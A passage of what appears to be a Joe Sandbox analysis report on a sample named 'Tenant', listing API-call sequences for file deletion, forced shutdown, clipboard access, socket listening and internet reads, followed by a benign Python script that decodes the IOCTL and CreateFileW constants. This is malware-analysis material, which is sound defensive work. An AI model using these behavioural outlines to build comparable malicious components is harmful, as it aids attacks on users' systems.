                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID:
                                                                                        • API String ID: 1433390588-0
                                                                                        • Opcode ID: 7df0588e01715922bbbfdccddb08518d897a9075e14218d027911d1264b88459
                                                                                        • Instruction ID: 7c52a6f2e1529adcb7961c5d1163ed65482cfd88da8bc0b2b231d793d3d15dc9
                                                                                        • Opcode Fuzzy Hash: 7df0588e01715922bbbfdccddb08518d897a9075e14218d027911d1264b88459
                                                                                        • Instruction Fuzzy Hash: B5318DB150121AABDB11AF60AD98EBF7BE8FF14301F108495FA1293190DB74DA10CBA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: 87b93e9186a6d5bb7ffe999f9c5ffd607c6ca776cfdd3c91a0e3f4e8c82c58a2
                                                                                        • Instruction ID: 3ce5587617d67ffb975a57b281283de18f30908afcde3abc927ce31552491586
                                                                                        • Opcode Fuzzy Hash: 87b93e9186a6d5bb7ffe999f9c5ffd607c6ca776cfdd3c91a0e3f4e8c82c58a2
                                                                                        • Instruction Fuzzy Hash: 1521C4312152109FDB01AF64ED6AF6E77E8EF85B21F108059F9069B2A1CF70AD40CB94
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                          • Part of subcall function 00B04FEC: GetFileAttributesW.KERNEL32(?,00B03BFE), ref: 00B04FED
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B03D96
                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B03E3E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B03E51
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B03E6E
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B03E90
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B03EAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 4002782344-1173974218
                                                                                        • Opcode ID: 35c0641d952f1cc1ab0af930495d59763fde168ab2d4386fa56e57cba7ef1c27
                                                                                        • Instruction ID: 6f6389862456424cff8f592d66c7d336e2505e83ef4e5a7435d374767e564dfa
                                                                                        • Opcode Fuzzy Hash: 35c0641d952f1cc1ab0af930495d59763fde168ab2d4386fa56e57cba7ef1c27
                                                                                        • Instruction Fuzzy Hash: 4851347180114D9ACF15EBA0CAA6DEEBBFDAF11301F6042A5E445B7192EF316F09CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B0FA83
                                                                                        • FindClose.KERNEL32(00000000), ref: 00B0FB96
                                                                                          • Part of subcall function 00AA52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA52E6
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B0FAB3
                                                                                        • _wcscmp.LIBCMT ref: 00B0FAC7
                                                                                        • _wcscmp.LIBCMT ref: 00B0FAE2
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 00B0FB80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                        • String ID: *.*
                                                                                        • API String ID: 2185952417-438819550
                                                                                        • Opcode ID: b6d7913e66e421f728600b78104b59bd046eded856540a3e4018dcf80930c6e6
                                                                                        • Instruction ID: a2ffca65eaf7b841545488f117f042765cebf3ec3d76fa6d89d7a6e310683635
                                                                                        • Opcode Fuzzy Hash: b6d7913e66e421f728600b78104b59bd046eded856540a3e4018dcf80930c6e6
                                                                                        • Instruction Fuzzy Hash: 6E415E71A4021AABDF25DF64CD69AEEBBB8FF05350F5481A5E814A31A1EB309A44CF50
                                                                                        APIs
                                                                                          • Part of subcall function 00AF9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF93E3
                                                                                          • Part of subcall function 00AF9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF9410
                                                                                          • Part of subcall function 00AF9399: GetLastError.KERNEL32 ref: 00AF941D
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00B057B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: 2bcdcf979292dbfd96eef3268c339bd4aa34dca51c6b284347dd9c76f756e744
                                                                                        • Instruction ID: 5fbeb32b7b3359a862650feba63cee61af9c8d232307b3239aa2ede846e811c2
                                                                                        • Opcode Fuzzy Hash: 2bcdcf979292dbfd96eef3268c339bd4aa34dca51c6b284347dd9c76f756e744
                                                                                        • Instruction Fuzzy Hash: 7701F231751716EAE73862A49C8ABBF7EDCEF08740F2001E9F913E68D2EA505C40A961
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B169C7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B169D6
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00B169F2
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00B16A01
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16A1B
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00B16A2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: e5c2e5c857e6f9cb7d08fa8ecedce3a06c2335d37ddb2c28370edc3eeb3adfbd
                                                                                        • Instruction ID: 7b64075a05d5bfb53daf4e6aef6db84450fa4fb30ee0b3e3980aa1a0a08da167
                                                                                        • Opcode Fuzzy Hash: e5c2e5c857e6f9cb7d08fa8ecedce3a06c2335d37ddb2c28370edc3eeb3adfbd
                                                                                        • Instruction Fuzzy Hash: 9921B130600604AFCB10EF64CD99A6EB7E9EF49720F248599F956A73D1CB70AD41CB91
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AA1DD6
                                                                                        • GetSysColor.USER32(0000000F), ref: 00AA1E2A
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00AA1E3D
                                                                                          • Part of subcall function 00AA166C: DefDlgProcW.USER32(?,00000020,?), ref: 00AA16B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorProc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3744519093-0
                                                                                        • Opcode ID: 115798a7fed15164ebba7c2928cba9e43ed6b80fcef0ba73e64db52ed34d5a96
                                                                                        • Instruction ID: f4a5608b42de77a866758effa38057eb65c034dc7b2a63e51a31b900e801d1ec
                                                                                        • Opcode Fuzzy Hash: 115798a7fed15164ebba7c2928cba9e43ed6b80fcef0ba73e64db52ed34d5a96
                                                                                        • Instruction Fuzzy Hash: F8A1437412A514FEE628AB699C49EBF39AEEF47305F25050BF402D72D2CF259D01C2B6
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B0C329
                                                                                        • _wcscmp.LIBCMT ref: 00B0C359
                                                                                        • _wcscmp.LIBCMT ref: 00B0C36E
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B0C37F
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B0C3AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: 75e42d525ba4d0561fbe213e89ce437e1583475037488dd63c23df3434b78d25
                                                                                        • Instruction ID: d2fff0097ce310c3f60d48c34ada649e1411fcf862e7e6b88900d69543d2c6eb
                                                                                        • Opcode Fuzzy Hash: 75e42d525ba4d0561fbe213e89ce437e1583475037488dd63c23df3434b78d25
                                                                                        • Instruction Fuzzy Hash: A4517A756046028FD714DF68D590EAABBE8FF49310F11869DF956873A1DB30ED04CB91
                                                                                        APIs
                                                                                          • Part of subcall function 00B18475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B184A0
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B16E89
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16EB2
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00B16EEB
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16EF8
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00B16F0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 99427753-0
                                                                                        • Opcode ID: 003f556f130c3686397c23476f88ed748dcca4eda4a01f3b2e33d7966faae0ec
                                                                                        • Instruction ID: bc0cc9ca9a82ca47b29dc7e77cb42db08420677c246654d82c6d21fe19231859
                                                                                        • Opcode Fuzzy Hash: 003f556f130c3686397c23476f88ed748dcca4eda4a01f3b2e33d7966faae0ec
                                                                                        • Instruction Fuzzy Hash: 0541B275600210AFDB10AF64D986FBE77E8DF89710F448558FA15AB3D2DBB0AD018BA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: ac0718c95d0af253841673ed3b69939290be7d86dbd7c0ea747ceb7653c90173
                                                                                        • Instruction ID: 5b5cde3ceedeef06f54d378392cc5a203a6c7a3d0128079126e0180faae8df1a
                                                                                        • Opcode Fuzzy Hash: ac0718c95d0af253841673ed3b69939290be7d86dbd7c0ea747ceb7653c90173
                                                                                        • Instruction Fuzzy Hash: CF11E7723109219FE7316F66AC85A2E7BD9FF86761B154169F80AD7241CF70ED018AE0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: cfdb68d8d2fb710c0c24efd6ccb52a2f89ebef128ccab151644a3856bb2cabaa
                                                                                        • Instruction ID: 4837aee1ee054e85667d6562ae6f47733ff996fb937ac53876baaef3df04f5cd
                                                                                        • Opcode Fuzzy Hash: cfdb68d8d2fb710c0c24efd6ccb52a2f89ebef128ccab151644a3856bb2cabaa
                                                                                        • Instruction Fuzzy Hash: D7D01272814148EACB159B92CD44EFE737CEB08300F604092F506E2080D77587C89B22
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00B12AAD
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B12AE4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: 5d9268f135d93d549594c271e683dea0b323820346ea5e6a513fa8b0a7d537d2
                                                                                        • Instruction ID: 9a1d10d73227700d82616cd384f742453e3a181176f4959f1c41798d0ee8034a
                                                                                        • Opcode Fuzzy Hash: 5d9268f135d93d549594c271e683dea0b323820346ea5e6a513fa8b0a7d537d2
                                                                                        • Instruction Fuzzy Hash: AA41D171604209FFEB20DF54CC81EFBB7ECEF40754F5040AEF605A6241EA70AEA19660
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF93E3
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF9410
                                                                                        • GetLastError.KERNEL32 ref: 00AF941D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: bb545d6159cadafd09ca78c6a6195bdd686914f2ef330d3001147ce469c411e9
                                                                                        • Instruction ID: 8bc5e05d1e5759e81f6342d046b0585f11ba2732133ab7679213285483ce5a57
                                                                                        • Opcode Fuzzy Hash: bb545d6159cadafd09ca78c6a6195bdd686914f2ef330d3001147ce469c411e9
                                                                                        • Instruction Fuzzy Hash: C2119DB1514209AFD728AF54DD85E2FB7BCEB44310B20812EF45A87250EA30AC41CA64
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B042FF
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00B0433C
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B04345
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: 0cd8550c3e84ea0f4956239b712dbe6f51e7eaf94d3696b55c7d38b95c359866
                                                                                        • Instruction ID: 1a9f94d0a331cc69e34e059095d6ac9898eb4d9f5574213828700228f4874143
                                                                                        • Opcode Fuzzy Hash: 0cd8550c3e84ea0f4956239b712dbe6f51e7eaf94d3696b55c7d38b95c359866
                                                                                        • Instruction Fuzzy Hash: 171182B1910229BFE7109BE89C44FAFBBBCEB08710F100256BA14E71D0C7745D0087A5
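Reading the CreateFileW / DeviceIoControl / CloseHandle sequence above: the control code 0x2D1400 and the CreateFileW flags appear only as raw constants. The decoder below is an added example for interpreting that listing, not code from the sample and not Joe Sandbox output; the constant names come from the Windows SDK headers (winioctl.h, winnt.h). The first CreateFileW argument, the device path, is shown as `?` in the listing, so which device is opened cannot be recovered from it and is deliberately left out of decode_listing().

```python
"""Decode the raw constants in the CreateFileW / DeviceIoControl sequence above.

Added example for reading the listing; not code from the sample or from Joe
Sandbox. Constant names are from the Windows SDK headers (winioctl.h, winnt.h).
A Windows IOCTL code is built as
    CTL_CODE(DeviceType, Function, Method, Access)
        = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
"""

# winioctl.h device types and transfer methods (subset).
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM",
                0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
# Control codes an analyst should recognise on sight (winioctl.h).
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY",
                0x2D1080: "IOCTL_STORAGE_GET_DEVICE_NUMBER",
                0x70000: "IOCTL_DISK_GET_DRIVE_GEOMETRY"}
STORAGE_PROPERTY_QUERY_SIZE = 12  # sizeof(STORAGE_PROPERTY_QUERY), x86 and x64

# winnt.h access rights, share modes, dispositions and flags (subset).
ACCESS_RIGHTS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                 0x00100000: "SYNCHRONIZE", 0x1: "FILE_READ_DATA",
                 0x2: "FILE_WRITE_DATA", 0x80: "FILE_READ_ATTRIBUTES",
                 0x100: "FILE_WRITE_ATTRIBUTES"}
SHARE_MODES = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE",
               0x4: "FILE_SHARE_DELETE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}


def decode_ioctl(code):
    """Split a control code into its CTL_CODE fields and name it when known."""
    device_type = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {"device_type": DEVICE_TYPES.get(device_type, hex(device_type)),
            "function": function,
            "method": METHODS[method],
            "access": ACCESS[access],
            "name": KNOWN_IOCTLS.get(code, "unknown")}


def flags_to_names(value, table):
    """Expand a bitmask into SDK names; bits missing from the table stay hex."""
    names, known = [], 0
    for bit, name in table.items():
        if value & bit:
            names.append(name)
            known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return names


def decode_createfile(desired_access, share_mode, disposition, flags):
    """Name the numeric CreateFileW arguments (path and security attrs omitted)."""
    return {"access": flags_to_names(desired_access, ACCESS_RIGHTS),
            "share": flags_to_names(share_mode, SHARE_MODES) or ["0 (exclusive)"],
            "disposition": DISPOSITIONS.get(disposition, hex(disposition)),
            "flags": flags_to_names(flags, FILE_FLAGS)}


def decode_listing():
    """Apply both decoders to the argument values visible in the listing above.

    The device path (first CreateFileW argument) is shown as '?' there and is
    therefore not part of this reconstruction.
    """
    handle_open = decode_createfile(0x80, 0x3, 0x3, 0x80)
    ioctl = decode_ioctl(0x2D1400)
    in_size, out_size = 0xC, 0xC
    return {"createfile": handle_open,
            "ioctl": ioctl,
            "in_buffer_is_storage_property_query": in_size == STORAGE_PROPERTY_QUERY_SIZE,
            "out_buffer_bytes": out_size}


if __name__ == "__main__":
    import json
    print(json.dumps(decode_listing(), indent=2))
```

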